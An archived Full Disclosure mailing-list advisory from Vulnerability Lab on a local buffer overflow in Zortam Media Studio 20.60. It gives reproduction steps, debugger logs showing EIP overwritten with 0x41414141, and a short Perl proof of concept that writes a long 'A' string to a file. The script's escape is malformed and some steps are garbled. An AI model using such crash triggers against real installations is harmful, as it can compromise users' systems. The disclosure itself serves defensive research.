[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Zortam Media Studio 20.60 - Buffer Overflow Vulnerability
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2016-07-28 9:57:35
Message-ID: 71a15391-b51f-bb8e-f900-a106099490d2 () vulnerability-lab ! com
[Download RAW message or body]

Document Title:
===============
Zortam Media Studio 20.60 - Buffer Overflow Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1884


Release Date:
=============
2016-07-27


Vulnerability Laboratory ID (VL-ID):
====================================
1884


Common Vulnerability Scoring System:
====================================
6.5


Product & Service Introduction:
===============================
Zortam Mp3 Media Studio is a great all-in-one music tool for organizing your Mp3/Karaoke \
collection for  editing Mp3 ID3 tags, 
ripping your CD, normalizing Mp3, converts Mp3/Wav and Wav/Mp3, to get song lyric and cover \
arts from the internet and  keeping your music collection well organized.

(Copy of the Vendor Homepage: http://www.zortam.com/ )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a local buffer overflow \
vulnerability in the offical Zortam MP3 Media Studio 20.60 software.


Vulnerability Disclosure Timeline:
==================================
2016-07-27:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
A buffer overflow vulnerability has been discovered in the official Zortam MP3 Media Studio \
20.60 software. The vulnerability allows local attackers to overwrite the registers to \
compromise the local software process.

The classic buffer overflow vulnerability is located in the software Zortam mp3. An attacker \
can manipulate the  bit EIP register in order to execute the next instruction of their choice. \
Attackers are able to for example  execute arbitrary codes with process privileges. The \
attacker includes a large unicode string to overwrite  the EIP register of the process. Finally \
the attacker is able to takeover the process by an overwrite of the  active program process to \
compromise the computer system.

The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common \
vulnerability  scoring system) count of 6.5. Exploitation of the vulnerability requires a low \
privilege or restricted system  user account without user interaction. Successful exploitation \
of the vulnerability results in computer system  manipulation and compromise of the computer \
system.


Proof of Concept (PoC):
=======================
The buffer overflow vulnerability can be exploited by local attackers with restricted system \
user account and without user interaction. For security demonstration or to reproduce the \
vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Launch Zortam mp3.exe                
2. Run the code in perl and a file format (.txt) will create
3. Click on search media to mp3
4. Open File .(.txt)
5. Copy and paste characters string AAAAAAAAAAA+ ... in input "Selects" and click the button \
"OK". 6. Software will crash with 
7. Successful reproduce of the local buffer overflow vulnerability!


--- Debug Logs ---
Access violation - code c0000005
eax=00000000 ebx=00000000 ecx=41414141 edx=776138a0 esi=00000000 edi=00000000
eip=41414141 esp=0014cf98 ebp=0014cfb8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
41414141 ??              ???
-
0:000> !exchain
0014cfac: ntdll!RtlConvertUlongToLargeInteger+b0 (776138a0)
0014d3b4: ntdll!RtlConvertUlongToLargeInteger+b0 (776138a0)
0014da6c: 41414141
Invalid exception stack at 41414141
-
0:000> d 0014da6c
0014da6c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0014da7c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0014da8c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0014da9c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0014daac  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0014dabc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0014dacc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0014dadc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

Note: EIP and ECX overwritten!


PoC: Perl Exploit
#!/usr/bin/perl
my $Buff = "x41" x 2000;
open(MYFILE,'>>File.txt');
print MYFILE $Buff;
close(MYFILE);
print " POC created by ZwXn";


Security Risk:
==============
The security risk of the local buffer overflow vulnerability in the studio software core is \
estimated as high. (CVSS 6.5)


Credits & Authors:
==================
ZwX - [http://www.vulnerability-lab.com/show.php?user=ZwX]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied,  including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage,  including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised  of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing  \
limitation may not apply. We do not approve or encourage anybody to break any licenses, \
policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 				- \
                admin@evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- \
                evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- \
                youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- \
                vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- \
vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically  redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or  its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific  authors or managers. To record, list, modify, use or \
edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.

				    Copyright  © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic